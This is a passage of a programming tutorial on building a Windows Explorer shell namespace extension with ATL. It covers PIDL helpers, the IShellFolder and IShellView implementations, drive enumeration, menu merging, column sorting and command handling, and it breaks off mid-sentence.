IPersistFolder has one method,
Initialize(), that is called so an extension can perform any startup initialization tasks.
IShellView is the interface through which Explorer informs an extension of UI-related events.
IShellView has methods that tell the extension to create and destroy a view window, refresh the display, and so on.
IOleCommandTarget is used by Explorer to send commands to the view, such as a refresh command when the user presses F5.
IShellBrowser is an interface exposed by Explorer, and lets an extension manipulate the Explorer window.
IShellBrowser has methods to change the menu, toolbar, and status bar, as well as send generic messages to the controls in Explorer.
To make dealing with PIDLs easier, our extension uses a helper class called
CPidlMgr that performs operations on PIDLs. I will touch on the important parts here, which are creating a PIDL, returning the data we stored in a PIDL, and returning a textual description of a PIDL. Here are the relevant parts of the class declaration:
class CPidlMgr { public: // Create a relative PIDL that stores a drive letter. LPITEMIDLIST Create ( const TCHAR ); // Get the drive letter from a PIDL. TCHAR GetData ( LPCITEMIDLIST ); // Create a text description of a PIDL. DWORD GetPidlPath ( LPCITEMIDLIST, LPTSTR ); private: // The shell's memory allocator. CComPtr<IMalloc> m_spMalloc; };
The
Create() function takes a drive letter and creates a relative PIDL that contains that drive letter as its data. We start by calculating the memory required for the first item in the PIDL.
LPITEMIDLIST CPidlMgr::Create ( const TCHAR chDrive ) { UINT uSize = sizeof(ITEMIDLIST) + sizeof(PIDLDATA);
Remember that one node in a PIDL is an
ITEMIDLIST
struct, which contains our
PIDLDATA
struct. Next, we use the shell's memory allocator to allocate memory for that first node, as well as a second
ITEMIDLIST which will mark the end of the PIDL.
LPITEMIDLIST pidlNew = (LPITEMIDLIST) m_spMalloc->Alloc(uSize + sizeof(ITEMIDLIST));
Now, we have to fill in the contents of the PIDL. To set up the first node, we set the members of the
SHITEMID
struct. The
cb member is set to
uSize, the size of the first node.
if ( pidlNew ) { LPITEMIDLIST pidlTemp = pidlNew; pidlTemp->mkid.cb = uSize;
Then we store our PIDL data in the
abID member (the variable-length block of memory at the end of the
struct).
PIDLDATA* pData = (PIDLDATA*) pidlTemp->mkid.abID; pData->chDriveLtr = chDrive;
Next, we advance
pidlTemp to the second node and set its members to zero to mark the end of the PIDL.
// GetNextItem() is a CPidlMgr helper function. pidlTemp = GetNextItem ( pidlTemp ); pidlTemp->mkid.cb = 0; pidlTemp->mkid.abID[0] = 0; } return pidlNew; }
The
GetData() function reads a PIDL and returns the drive letter stored in the PIDL.
TCHAR CPidlMgr::GetData ( LPCITEMIDLIST pidl ) { PIDLDATA* pData; pData = (PIDLDATA*)( pidl->mkid.abID ); return pData->chDriveLtr; }
The last method I'll cover here,
GetPidlDescription(), returns a textual description of a PIDL.
void CPidlMgr::GetPidlDescription ( LPCITEMIDLIST pidl, LPTSTR szDesc ) { TCHAR chDrive = GetData ( pidl ); if ( '\0' != chDrive ) wsprintf ( szDesc, _T("Drive %c:"), chDrive ); else *szDesc = '\0'; }
GetPidlDescription() uses
GetData() to read the drive letter from the PIDL, then returns a string such as "Drive A:" which can be shown in the user interface.
When our extension receives a request for an enumerator, we create a collection of drive letters representing the drives to be shown in the shell view. We then use ATL's
CComEnumOnSTL class to create the enumerator.
CComEnumOnSTL
CComEnumOnSTL requires four things from us:
IEnumIDList.
LPITEMIDLIST.
The collection holding the data must be an STL container such as
vector or
list. Our extension will use a
vector<TCHAR> to hold the drive letters.
ATL calls methods in the copy policy class when it needs to initialize, copy, or destroy elements. The generic form of a copy policy class is:
// SRCTYPE is the type of the objects in the collection. // DESTTYPE is the type being returned from the enumerator. class CopyPolicy { public: // initialize an object before copying into it static void init ( DESTTYPE* p ); // copy an element static HRESULT copy ( DESTTYPE* p1, SRCTYPE* p2 ); // destroy an element static void destroy ( DESTTYPE* p ); };
Here is our copy policy class:
class CCopyTcharToPidl { public: static void init ( LPITEMIDLIST* p ) { // No init needed. } static HRESULT copy ( LPITEMIDLIST* pTo, const TCHAR* pFrom ) { *pTo = m_PidlMgr.Create ( *pFrom ); return (NULL != *pTo) ? S_OK : E_OUTOFMEMORY; } static void destroy ( LPITEMIDLIST* p ) { m_PidlMgr.Delete ( *p ); } private: static CPidlMgr m_PidlMgr; };
This is pretty straightforward; we use
CPidlMgr to do the work of creating and deleting PIDLs. One last thing we need is a
typedef that puts all this together into one class.
typedef // name and IID of enumerator interface CComEnumOnSTL<IEnumIDList, &IID_IEnumIDList, // type of object to return LPITEMIDLIST, // copy policy class CCopyTcharToPidl, // type of collection holding the data std::vector<TCHAR> > CEnumIDListImpl;
When Explorer creates our namespace extension, it first instantiates an
IShellFolder object.
IShellFolder has methods for browsing to a new virtual folder, creating a shell view window, and taking actions on the folder's contents. The important
IShellFolder methods are:
GetClassID()- Inherited from
IPersist. Returns our object CLSID to Explorer.
Initialize()- Inherited from
IPersistFolder. Gives us a chance to do one-time initialization.
BindToObject()- Called when a folder in our part of the namespace is being browsed. Its job is to create a new
IShellFolderobject, initialize it with the PIDL of the folder being browsed, and return that new object to the shell.
CompareIDs()- Responsible for comparing two PIDLs and returning their relative order.
CreateViewObject()- Called when Explorer wants us to create our shell view. It creates a new
IShellViewobject and returns it to Explorer.
EnumObjects()- Creates a new PIDL enumerator that can enumerate the contents of the virtual folder.
GetAttributesOf()- Returns attributes (such as read-only) for an item or items in the virtual folder.
GetUIObjectOf()- Returns a COM object implementing a UI element (such as a context menu) associated with an item or items in the virtual folder.
I will cover two of the important methods here,
CreateViewObject() and
EnumObjects().
Explorer calls
CreateViewObject() when it wants our extension to create a window in the shell view pane. The prototype for
CreateViewObject() is:
STDMETHODIMP IShellFolder::CreateViewObject ( HWND hwndOwner, REFIID riid, void** ppvOut );
hwndOwner is the window in Explorer which will be the parent for our view window.
riid and
ppvOut are the IID of the interface Explorer is requesting (
IID_IShellView in our example) and an out parameter where we'll store the requested interface pointer. Our
CreateViewObject() method creates a new
CShellViewImpl COM object (our class that implements
IShellView, which I will cover later).
STDMETHODIMP CShellFolderImpl::CreateViewObject ( HWND hwndOwner, REFIID riid, void** ppvOut ) { HRESULT hr; CComObject<CShellViewImpl>* pShellView; // Create a new CShellViewImpl COM object. hr = CComObject<CShellViewImpl>::CreateInstance ( &pShellView ); if ( FAILED(hr) ) return hr;
This uses
CComObject to create a new
CShellViewImpl object. Next, we call a private initialization function in
CShellViewImpl and pass it a pointer to the folder object. The view will use this pointer later in calls to
EnumObjects() and
CompareIDs().
// AddRef() the object while we're using it. pShellView->AddRef(); // Object initialization - pass the object its containing folder (this). hr = pShellView->_init ( this ); if ( FAILED(hr) ) { pShellView->Release(); return hr; }
Finally, we query the
CShellViewImpl object for the interface that Explorer is requesting.
// Return the requested interface back to the shell. hr = pShellView->QueryInterface ( riid, ppvOut ); pShellView->Release(); return hr; }
(This method doesn't pass
hwndOwner to the view object, but the view object retrieves the parent window on its own, so this is OK.)
In our simple extension,
EnumObjects() is called by the view object when it needs to know the contents of the folder it is displaying. Notice the clear separation of functionality here: the shell folder knows the contents, but has no UI code; the shell view handles the UI, but doesn't intrinsically know the contents of the folder.
The prototype for
EnumObjects() is:
STDMETHODIMP IShellFolder::EnumObjects ( HWND hwndOwner, DWORD dwFlags, LPENUMIDLIST* ppEnumIDList );
hwndOwner is a window that can be used as the parent window of any dialogs or message boxes that the method might need to display.
dwFlags is used to tell the method what type of objects to return in the enumerator (for example, only subfolders or only non-folders). Our extension has no subfolders, so we have no need to check the flags.
ppEnumIDList is an out parameter in which we store an
IEnumIDList interface to the enumerator object that the method creates.
Our
EnumObjects() method creates a new
CEnumIDListImpl object, and fills in a
vector<TCHAR> with the drive letters on the system. The enumerator object uses the
vector and our copy policy class (as described earlier in the "Requirements for using
"#RequirementsforusingCComEnumOnSTL">CComEnumOnSTL" section) to return PIDLs.
Here's the beginning of our
EnumObjects(). We first fill in the
vector (which is a member,
m_vecDriveLtrs).
STDMETHODIMP CShellFolderImpl::EnumObjects ( HWND hwndOwner, DWORD dwFlags, LPENUMIDLIST* ppEnumIDList ) { HRESULT hr; DWORD dwDrives; int i; // Enumerate all drives on the system // and put the letters of the drives into a vector. m_vecDriveLtrs.clear(); for ( i = 0, dwDrives = GetLogicalDrives(); i <= 25; i++ ) if ( dwDrives & (1 << i) ) m_vecDriveLtrs.push_back ( 'A' + i );
Next, we create a
CEnumIDListImpl object.
// Create an enumerator with CComEnumOnSTL<> and our copy policy class. CComObject<CEnumIDListImpl>* pEnum; hr = CComObject<CEnumIDListImpl>::CreateInstance ( &pEnum ); if ( FAILED(hr) ) return hr; // AddRef() the object while we're using it. pEnum->AddRef();
Next, we initialize the enumerator, passing it the folder's
IUnknown interface and a reference to the
vector.
CComEnumOnSTL calls
AddRef on the
IUnknown to ensure that the folder COM object remains in memory while the enumerator is using it.
hr = pEnum->Init ( GetUnknown(), m_vecDriveLtrs );
Finally, we return an
IEnumIDList interface to the caller.
// Return an IEnumIDList interface to the caller. if ( SUCCEEDED(hr) ) hr = pEnum->QueryInterface ( IID_IEnumIDList, (void**) ppEnumIDList ); pEnum->Release(); return hr; }
Our
IShellView implementation creates a list control in report mode (the most common way for namespace extensions to show data, since it follows what Explorer itself does). The class
CShellViewImpl also derives from ATL's
CWindowImpl class, meaning
CShellViewImpl is a window and has a message map.
CShellViewImpl creates its own window, then creates the list control as a child. That way,
CShellViewImpl's message map receives notification messages from the list control.
CShellViewImpl also derives from
IOleCommandTarget so it can receive commands from Explorer.
The important
IShellView methods are:
GetWindow()- Inherited from
IOleWindow. Returns our shell view's window handle.
CreateViewWindow()- Creates a new shell view window.
DestroyViewWindow()- Destroys the shell view window, and lets us do any cleanup tasks.
GetCurrentInfo()- Returns our view's current view settings in a
FOLDERSETTINGS
struct.
FOLDERSETTINGSis described below.
Refresh()- Called when we must refresh the contents of the shell view.
UIActivate()- Called when our view gains or loses focus. This method is when the view can modify Explorer's UI to add custom commands.
I will cover
CreateViewWindow() and
UIActivate() in detail here, since that's where most of the UI action happens.
Managing the UI requires saving a lot of state information, so I've listed that data here along with the class declaration:
class ATL_NO_VTABLE CShellViewImpl : public CComObjectRootEx<CComSingleThreadModel>, public CComCoClass<CShellViewImpl, &CLSID_ShellViewImpl>, public IShellView, public IOleCommandTarget, public CWindowImpl<CShellViewImpl> { public: DECLARE_NO_REGISTRY() DECLARE_WND_CLASS(NULL) BEGIN_COM_MAP(CShellViewImpl) COM_INTERFACE_ENTRY(IShellView) COM_INTERFACE_ENTRY(IOleWindow) COM_INTERFACE_ENTRY(IOleCommandTarget) END_COM_MAP() BEGIN_MSG_MAP(CShellViewImpl) MESSAGE_HANDLER(WM_CREATE, OnCreate) MESSAGE_HANDLER(WM_SIZE, OnSize) // ... END_MSG_MAP()
Pretty standard stuff so far. Notice the
DECLARE_NO_REGISTRY() macro - this tells ATL that this COM object does not require registration, and has no corresponding .RGS file. Skipping to the private data, we first have some variables holding various UI states:
private: CPidlMgr m_PidlMgr; UINT m_uUIState; int m_nSortedColumn; bool m_bForwardSort; FOLDERSETTINGS m_FolderSettings;
m_uUIState holds a constant from the following list:
SVUIA_ACTIVATE_FOCUS- Our view window has the focus.
SVUIA_ACTIVATE_NOFOCUS- Our view window is visible in Explorer, but some other window (the tree view or address bar) currently has the focus.
SVUIA_DEACTIVATE- Our view window is about to lose focus and be hidden or destroyed (for example, a different folder was just selected in the tree view).
This member is used when we add or remove our own commands from Explorer's menu. Next are
m_nSortedColumn and
m_bForwardSort, which describe how the list control's contents are currently being sorted. Finally, there's
m_FolderSettings, which Explorer passes to us. It contains various flags regarding the suggested appearance of the view window.
Window and UI object handles are next:
HWND m_hwndParent; HMENU m_hMenu; CContainedWindowT<ATLControls::CListViewCtrl> m_wndList;
m_hwndParent is a window in Explorer that we use as the parent of our own window.
m_hMenu is a handle to a menu that is shared between Explorer and our extension. Finally,
m_wndList is a list control wrapper from atlcontrols.h (included in the source zip file) that we use to manage our list control.
Next are a couple of interface pointers:
CShellFolderImpl* m_psfContainingFolder; CComPtr<IShellBrowser> m_spShellBrowser;
m_psfContainingFolder is an interface on the
CShellFolderImpl object that created the view.
m_spShellBrowser is an
IShellBrowser interface pointer that Explorer passes to the view that lets it manipulate the Explorer window (for example, modify the menu).
Finally, some member functions.
FillList() populates the list control.
CompareItems() is a callback used when sorting the list's contents.
HandleActivate() and
HandleDeactivate() are helper functions that modify Explorer's menu so that our custom commands appear in the menu.
void FillList(); static int CALLBACK CompareItems ( LPARAM l1, LPARAM l2, LPARAM lData ); void HandleActivate(UINT uState); void HandleDeactivate(); };
This is the sequence of events that occur when our shell view gets created:
CShellFolderImpl::CreateViewObject()creates a
CShellViewImpland calls
_init()(this is how
m_psfContainingFolderis set).
CShellViewImpl::CreateViewWindow().
CShellViewImpl::CreateViewWindow()creates a container window.
CShellViewImpl::OnCreate()handles
WM_CREATEsent during the previous step and creates the list control as a child of the container window.
CreateViewWindow() is responsible for creating a shell view window and returning its handle to Explorer. The prototype is:
STDMETHODIMP IShellView::CreateViewWindow ( LPSHELLVIEW pPrevView, LPCFOLDERSETTINGS lpfs, LPSHELLBROWSER psb, LPRECT prcView, HWND* phWnd );
pPrevView is a pointer to a previous shell view that is being replaced, if there is one. Our extension doesn't use this.
lpfs points to a
FOLDERSETTINGS
struct, which I described in the previous section.
psb is an
IShellBrowser interface provided by Explorer. We use this to modify the Explorer UI.
prcView points to a
RECT which holds the coordinates our container window should occupy. Finally,
phWnd is an out parameter where we'll return the container's window handle.
Our
CreateViewWindow() first initializes some member data:
STDMETHODIMP CShellViewImpl::CreateViewWindow ( LPSHELLVIEW pPrevView, LPCFOLDERSETTINGS lpfs, LPSHELLBROWSER psb, LPRECT prcView, HWND* phWnd ) { // Init member variables. m_spShellBrowser = psb; m_FolderSettings = *lpfs; // Get the parent window from Explorer. m_spShellBrowser->GetWindow( &m_hwndParent );
Then we create our container window (remember that
CShellViewImpl inherits from
CWindowImpl):
// Create a container window, which will be the parent of the list control. if ( NULL == Create ( m_hwndParent, *prcView ) ) return E_FAIL; // Return our window handle to the browser. *phWnd = m_hWnd; return S_OK; }
The
CWindowImpl::Create() call above generates a
WM_CREATE message, which
CShellViewImpl's message map routes to
CShellViewImpl::OnCreate().
OnCreate() creates a list control and attaches
m_wndList to it.
LRESULT CShellViewImpl::OnCreate ( UINT uMsg, WPARAM wParam, LPARAM lParam, BOOL& bHandled ) { HWND hwndList; DWORD dwListStyles = WS_CHILD | WS_VISIBLE | WS_TABSTOP | WS_BORDER | LVS_SINGLESEL | LVS_SHOWSELALWAYS | LVS_SHAREIMAGELISTS; DWORD dwListExStyles = WS_EX_CLIENTEDGE; DWORD dwListExtendedStyles = LVS_EX_FULLROWSELECT | LVS_EX_HEADERDRAGDROP; // Set the list view's display style (large/small/list/report) based on // the FOLDERSETTINGS we were given in CreateViewWindow(). switch ( m_FolderSettings.ViewMode ) { case FVM_ICON: dwListStyles |= LVS_ICON; break; case FVM_SMALLICON: dwListStyles |= LVS_SMALLICON; break; case FVM_LIST: dwListStyles |= LVS_LIST; break; case FVM_DETAILS: dwListStyles |= LVS_REPORT; break; DEFAULT_UNREACHABLE; }
This sets up the list control's window styles. Next, we create the list control and attach
m_wndList.
// Create the list control. Note that m_hWnd (inherited from CWindowImpl) // has already been set to the container window's handle. hwndList = CreateWindowEx ( dwListExStyles, WC_LISTVIEW, NULL, dwListStyles, 0, 0, 0, 0, m_hWnd, (HMENU) sm_uListID, _Module.GetModuleInstance(), 0 ); if ( NULL == hwndList ) return -1; m_wndList.Attach ( hwndList ); // omitted - set up columns & image lists. FillList(); return 0; }
CShellViewImpl::FillList() is responsible for populating the list control. It first calls the
EnumObjects() method of its containing shell folder to get an enumerator for the contents of the folder.
void CShellViewImpl::FillList() { CComPtr<IEnumIDList> pEnum; LPITEMIDLIST pidl = NULL; HRESULT hr; // Get an enumerator object for the folder's contents. Since this simple // extension doesn't deal with subfolders, we request only non-folder // objects. hr = m_psfContainingFolder->EnumObjects ( m_hWnd, SHCONTF_NONFOLDERS, &pEnum ); if ( FAILED(hr) ) return;
We then begin enumerating the folder's contents, and add a list item for each drive. We make a copy of each PIDL and store it in each list item's data area for later use.
DWORD dwFetched; while ( pEnum->Next(1, &pidl, &dwFetched) == S_OK ) { LVITEM lvi = {0}; TCHAR szText[MAX_PATH]; lvi.mask = LVIF_TEXT | LVIF_IMAGE | LVIF_PARAM; lvi.iItem = m_wndList.GetItemCount(); lvi.iImage = 0; // Store a PIDL for the drive letter, // using the lParam member for each item TCHAR chDrive = m_PidlMgr.GetData ( pidl ); lvi.lParam = (LPARAM) m_PidlMgr.Create ( chDrive );
As for the item's text, we use
CPidlMgr::GetPidlDescription() to get a string.
// Column 1: Drive letter m_PidlMgr.GetPidlDescription ( pidl, szText ); lvi.pszText = szText; m_wndList.InsertItem ( &lvi );
I've omitted the code to fill in the other columns, since it's just straightforward list control calls. Finally, we sort the list by the first column.
CListSortInfo is a
struct that holds info needed by the
CompareItems() callback. The second member (
SIMPNS_SORT_DRIVELETTER) indicates which column to sort by.
// Sort the items by drive letter initially. CListSortInfo sort = { m_psfContainingFolder, SIMPNS_SORT_DRIVELETTER, true }; m_wndList.SortItems ( CompareItems, (LPARAM) &sort ); }
Here's what the resulting list looks like:
Explorer calls
CShellViewImpl::UIActivate() to inform us when our window is gaining or losing focus. When these events occur, we can add or remove commands to Explorer's menu and toolbar. In this section, I'll cover how we handle the activation messages; the next section will cover modifying the UI.
UIActivate() is rather simple, it compares the new state with the last-saved state, and then delegates the call to the
HandleActive() helper.
STDMETHODIMP CShellViewImpl::UIActivate ( UINT uState ) { // Nothing to do if the state hasn't changed since the last call. if ( m_uUIState == uState ) return S_OK; // Modify the Explorer menu and status bar. HandleActivate ( uState ); return S_OK; }
HandleActivate() will be covered in the next section. There are a couple of tricky situations dealing with window focus. Our container window has the
WS_TABSTOP style, meaning the user can TAB to the window. Since the container window itself has no UI, it just sets the focus to the list control:
LRESULT CShellViewImpl::OnSetFocus ( UINT uMsg, WPARAM wParam, LPARAM lParam, BOOL& bHandled ) { m_wndList.SetFocus(); return 0; }
The other tricky case is when the user clicks on the list control directly to give it the focus. Normally, Explorer keeps track of which window has the focus. Since the list is not owned or managed by Explorer, it isn't notified when the list directly receives the focus. As a result, Explorer loses track of the focused window. When we receive a
NM_SETFOCUS message from the list, indicating that it received the focus, we call
IShellBrowser::OnViewWindowActivate() to tell Explorer that our view window now has the focus.
LRESULT CShellViewImpl::OnListSetfocus ( int idCtrl, LPNMHDR pnmh, BOOL& bHandled ) { // Tell the browser that we have the focus. m_spShellBrowser->OnViewWindowActive ( this ); HandleActivate ( SVUIA_ACTIVATE_FOCUS ); return 0; }
Namespace extensions can change Explorer's menu and toolbar to add their own commands. During development, I was unable to reliably modify the toolbar, so the sample extension only modifies the menu. Our extension uses two helper functions when modifying the menu,
HandleActivate() to do the modifications, and
HandleDeactivate() to remove them. We have two different menus, one if the list control has the focus, and another one if not. The two are pictured here:
This popup menu is inserted right before Explorer's Help menu. The Explore Drive item opens another Explorer window on the selected drive. The System Properties item runs the System Control Panel applet. We also add an item to the Help menu that shows our own About box.
HandleActivate() takes one parameter, the UI state that Explorer is about to enter. The first thing it does is call
HandleDeactivate() to undo the previous menu modifications and destroy the old menu.
void CShellViewImpl::HandleActivate ( UINT uState ) { // Undo our previous changes to the menu. HandleDeactivate();
I will cover
HandleDeactivate() shortly. Next, if our window is being activated, we can start modifying the menu. We first create a new, empty menu.
// If we are being activated, add our stuff to Explorer's menu. if ( SVUIA_DEACTIVATE != uState ) { // First, create a new menu. ATLASSERT(NULL == m_hMenu); m_hMenu = CreateMenu();
The next step is to call
IShellBrowser::InsertMenusSB(), which lets Explorer put its menu items in the newly-created menu.
InsertMenusSB() takes its logic from OLE containers, which also have shared menus. Our extension creates an
OLEMENUGROUPWIDTHS
struct and passes that, along with the menu handle, to
InsertMenusSB(). That
struct has an array of six
LONGs, representing six "groups" within the menu. The container (in this case, Explorer) uses groups 0, 2, and 4; while the contained object (our extension) uses groups 1, 3, and 5. Explorer fills in indexes 0, 2, and 4 of the array with the number of top-level menu items it put in each group. A normal situation has the array returning as {2, 0, 3, 0, 1, 0} representing two menus in the first group (File, Edit), three in the third group (View, Favorites, Tools), and one in the fifth group (Help). Our extension can use those numbers to calculate where the standard menus are, and where it can insert its own top-level menu items.
Now, luckily for us, Explorer isn't a generic OLE container. Its standard menus are always the same, and there are some predefined constants we can use to access the standard menus and avoid doing error-prone calculations with group widths. They are defined in shlobj.h as
FCIDM_*, for example,
FCIDM_MENU_EDIT for the position of the standard Edit menu. Our extension uses the
FCIDM_MENU_HELP to locate the standard Help menu, and inserts the popup menu pictured above right before Help.
Here is the code that sets up the shared menu, and adds a popup before Help.
if ( NULL != m_hMenu ) { // Let the browser insert its standard items first. OLEMENUGROUPWIDTHS omw = { 0, 0, 0, 0, 0, 0 }; m_spShellBrowser->InsertMenusSB ( m_hMenu, &omw ); // Insert our SimpleExt menu before the Explorer Help menu. HMENU hmenuSimpleNS; hmenuSimpleNS = LoadMenu ( ... ); if ( NULL != hmenuSimpleNS ) { InsertMenu ( m_hMenu, FCIDM_MENU_HELP, MF_BYCOMMAND | MF_POPUP, (UINT_PTR) GetSubMenu ( hmenuSimpleNS, 0 ), _T("&SimpleNSExt") ); }
Next, we add our About box item. We first get the handle to the Help menu using
GetMenuItemInfo(), then insert a new menu item.
MENUITEMINFO mii = { sizeof(MENUITEMINFO), MIIM_SUBMENU }; if ( GetMenuItemInfo ( m_hMenu, FCIDM_MENU_HELP, FALSE, &mii )) { InsertMenu ( mii.hSubMenu, -1, MF_BYPOSITION, IDC_ABOUT_SIMPLENS, _T("About &SimpleNSExt") ); }
One last thing we do is remove the standard Edit menu if our view window has the focus. The standard Edit menu is empty in this case, so there's no use in leaving it there.
if ( SVUIA_ACTIVATE_FOCUS == uState ) { // The Edit menu created by Explorer // is empty, so we can nuke it. DeleteMenu ( m_hMenu, FCIDM_MENU_EDIT, MF_BYCOMMAND ); }
Finally, we call
IShellBrowser::SetMenuSB() to have Explorer use the menu. We then save the new UI state and return.
// Set the new menu. m_spShellBrowser->SetMenuSB ( m_hMenu, NULL, m_hWnd ); } } m_uUIState = uState; }
HandleDeactivate() is much simpler. It calls
SetMenuSB() and
RemoveMenusSB() to remove our menu from Explorer's frame, then destroys the menu.
void CShellViewImpl::HandleDeactivate() { if ( SVUIA_DEACTIVATE != m_uUIState ) { if ( NULL != m_hMenu ) { m_spShellBrowser->SetMenuSB ( NULL, NULL, NULL ); m_spShellBrowser->RemoveMenusSB ( m_hMenu ); DestroyMenu ( m_hMenu ); // also destroys the SimpleNSExt submenu m_hMenu = NULL; } m_uUIState = SVUIA_DEACTIVATE; } }
One important thing to check is that your menu item IDs fall within
FCIDM_SHVIEWFIRST and
FCIDM_SHVIEWLAST (defined in shlobj.h as 0 and 0x7FFF respectively), otherwise Explorer will not properly route messages to our extension.
Our view window handles several standard and list control notification messages. They are:
WM_CREATE: Sent when our view window is first created.
WM_SIZE: Sent when the view is resized. The handler resizes the list control to match.
WM_SETFOCUS,
NM_SETFOCUS: Described earlier.
WM_CONTEXTMENU: Handles a right-click in the list control, and shows a context menu if a list item was clicked.
WM_INITMENUPOPUP: Sent when a menu is first clicked on, and disables the Explore Drive item if no drive is selected.
WM_MENUSELECT: Sent when a new menu item is selected, and shows a flyby help string in Explorer's status bar.
WM_COMMAND: Sent when one of our menu items is selected.
LVN_DELETEITEM: Sent when a list item is being removed. The handler deletes the PIDL stored with each item.
HDN_ITEMCLICK: Sent when a list header is clicked, and re-sorts the list by that column.
I will cover some of the more interesting handlers here, the ones for
WM_MENUSELECT,
HDN_ITEMCLICK, and
WM_COMMAND.
Our window receives
WM_MENUSELECT when the selected menu item changes. Our handler verifies that the selected item matches one of our menu IDs, and if so, shows a help string in Explorer's status bar.
LRESULT CShellViewImpl::OnMenuSelect(UINT uMsg, WPARAM wParam, LPARAM lParam, BOOL& bHandled) { WORD wMenuID = LOWORD(wParam); WORD wFlags = HIWORD(wParam); // If the selected menu item is one of ours, show a flyby help string // in the Explorer status bar. if ( !(wFlags & MF_POPUP) ) { switch ( wMenuID ) { case IDC_EXPLORE_DRIVE: case IDC_SYS_PROPERTIES: case IDC_ABOUT_SIMPLENS: { CComBSTR bsHelpText; if ( bsHelpText.LoadString ( wMenuID )) m_spShellBrowser->SetStatusTextSB ( bsHelpText.m_str ); return 0; } break; } } // Otherwise, pass the message to the default handler. return DefWindowProc(); }
We use
IShellBrowser::SetStatusTextSB() to change the status bar text.
HDN_ITEMCLICK is sent when the user clicks a column header. We first check the current sorted column. If the same column was clicked,
m_bForwardSort is toggled to reverse the sort direction. Otherwise, the new column is saved as the current sorted column.
LRESULT CShellViewImpl::OnHeaderItemclick ( int idCtrl, LPNMHDR pnmh, BOOL& bHandled ) { NMHEADER* pNMH = (NMHEADER*) pnmh; int nClickedItem = pNMH->iItem; // Set the sorted column to the column that was just clicked. If we're // already sorting on that column, reverse the sort order. if ( nClickedItem == m_nSortedColumn ) m_bForwardSort = !m_bForwardSort; else m_bForwardSort = true; m_nSortedColumn = nClickedItem;
Next, we set up a
CListSortInfo data packet which holds a pointer to the view's containing shell folder (which is the object that knows how to sort PIDLs), the column to sort, and the direction. We then call the list control method
SortItems (which boils down to a
LVM_SORTITEMS message).
// Set up a CListSortInfo for the sort function to use. const ESortedField aFields[] = { SIMPNS_SORT_DRIVELETTER, SIMPNS_SORT_VOLUMENAME, SIMPNS_SORT_FREESPACE, SIMPNS_SORT_TOTALSPACE }; CListSortInfo sort = { m_psfContainingFolder, aFields[m_nSortedColumn], m_bForwardSort }; m_wndList.SortItems ( CompareItems, (LPARAM) &sort ); return 0; }
To show how the sorting works, here is
CShellViewImpl::CompareItems():
int CALLBACK CShellViewImpl::CompareItems ( LPARAM l1, LPARAM l2, LPARAM lData ) { CListSortInfo* pSort = (CListSortInfo*) lData; return (int) pSort->pShellFolder->CompareIDs ( lData, (LPITEMIDLIST) l1, (LPITEMIDLIST) l2 ); }
This just calls through to
CShellFolderImpl::CompareIDs(). The parameters are the
LPARAM data values for the two items being compared (
l1 and
l2), plus the second parameter to
SortItems() (
lData) which is the
CListSortInfo
struct we set up in
OnHeaderItemclick().
Here is
CompareIDs(). It takes the same three parameters as
CompareItems(), just in a different order. The return value is like
strcmp() (-1, 0, or 1 indicating the order of the PIDLs). We first use
CPidlMgr::GetData() to retrieve the two drive letters from the PIDLs.
STDMETHODIMP CShellFolderImpl::CompareIDs ( LPARAM lParam, LPCITEMIDLIST pidl1, LPCITEMIDLIST pidl2 ) { TCHAR chDrive1 = m_PidlMgr.GetData ( pidl1 ); TCHAR chDrive2 = m_PidlMgr.GetData ( pidl2 ); CListSortInfo* pSortInfo = (CListSortInfo*) lParam; HRESULT hrRet;
Next, we check the field to sort by. I'll show sorting by drive letter here.
switch ( pSortInfo->nSortedField ) { case SIMPNS_SORT_DRIVELETTER: { // Sort alphabetically by drive letter. if ( chDrive1 == chDrive2 ) hrRet = 0; else if ( chDrive1 < chDrive2 ) hrRet = -1; else hrRet = 1; } break; ... }
The other cases are similar; they just get different information (volume name, free space, etc.) and set
hrRet based on that. The last step is to check the sort order and reverse it if necessary.
// If the sort order is reversed (z->a or highest->lowest), // negate the return value. if ( !pSortInfo->bForwardSort ) hrRet *= -1; return hrRet; }
CShellViewImpl's message map has a
COMMAND_ID_HANDLER entry for each of our menu commands:
BEGIN_MSG_MAP(CShellViewImpl) ... COMMAND_ID_HANDLER(IDC_SYS_PROPERTIES, OnSystemProperties) COMMAND_ID_HANDLER(IDC_EXPLORE_DRIVE, OnExploreDrive) COMMAND_ID_HANDLER(IDC_ABOUT_SIMPLENS, OnAbout) END_MSG_MAP()
Here is the code for
OnExploreDrive(). We begin by getting the selected item, then retrieving its
LPARAM data which is the corresponding PIDL.
LRESULT CShellViewImpl::OnExploreDrive(WORD wNotifyCode, WORD wID, HWND hWndCtl, BOOL& bHandled) { LPCITEMIDLIST pidlSelected; int nSelItem; TCHAR chDrive; TCHAR szPath[] = _T("?:\\"); nSelItem = m_wndList.GetNextItem ( -1, LVIS_SELECTED ); pidlSelected = (LPCITEMIDLIST) m_wndList.GetItemData ( nSelItem ); chDrive = m_PidlMgr.GetData ( pidlSelected );
We then fill in the drive letter in
szPath, and call
ShellExecute() to explore that drive.
*szPath = chDrive; ShellExecute ( NULL, _T("explore"), szPath, NULL, NULL, SW_SHOWNORMAL ); return 0; }
One additional way Explorer communicates with our extension is the
IOleCommandTarget interface. This has two methods:
QueryStatus(): Called by Explorer to determine which standard commands our extension supports.
Exec(): Called when the user executes a command in Explorer that we have to deal with.
There is little documentation regarding the commands, what they are used for, or even what their IDs are. The only meaningful command I could see is Refresh, which is sent when the user presses F5 or clicks Refresh on the View menu. In the following sections, I demonstrate a minimal implementation of the two methods that handle the Refresh command. The actual code in the sample project contains trace messages so you can see what commands are being queried for and sent.
The parameters to
QueryStatus() are a command group and one or more commands. If
QueryStatus() returns
S_OK, it means our extension supports the commands, and Explorer can then call
Exec() to have us respond to the commands. There are three groups that I saw being used during my testing:
NULL,
CGID_Explorer, and
CGID_ShellDocView. The Refresh command is in the
NULL group, and has ID
OLECMDID_REFRESH. Our
QueryStatus() just looks through the commands, and if it finds
OLECMDID_REFRESH, it sets flags in the
OLECMD
struct and returns
S_OK. Otherwise, it returns an error code to indicate that we don't support the command.
STDMETHODIMP CShellViewImpl::QueryStatus ( const GUID* pguidCmdGroup, ULONG cCmds, OLECMD prgCmds[], OLECMDTEXT* pCmdText ) { if ( NULL == pguidCmdGroup ) { for ( UINT u = 0; u < cCmds; u++ ) { switch ( prgCmds[u].cmdID ) { case OLECMDID_REFRESH: prgCmds[u].cmdf = OLECMDF_SUPPORTED | OLECMDF_ENABLED; break; } } return S_OK; } return OLECMDERR_E_UNKNOWNGROUP; }
Our
Exec() method again checks for the
NULL command group and Refresh command ID, and if the parameters match those values, calls
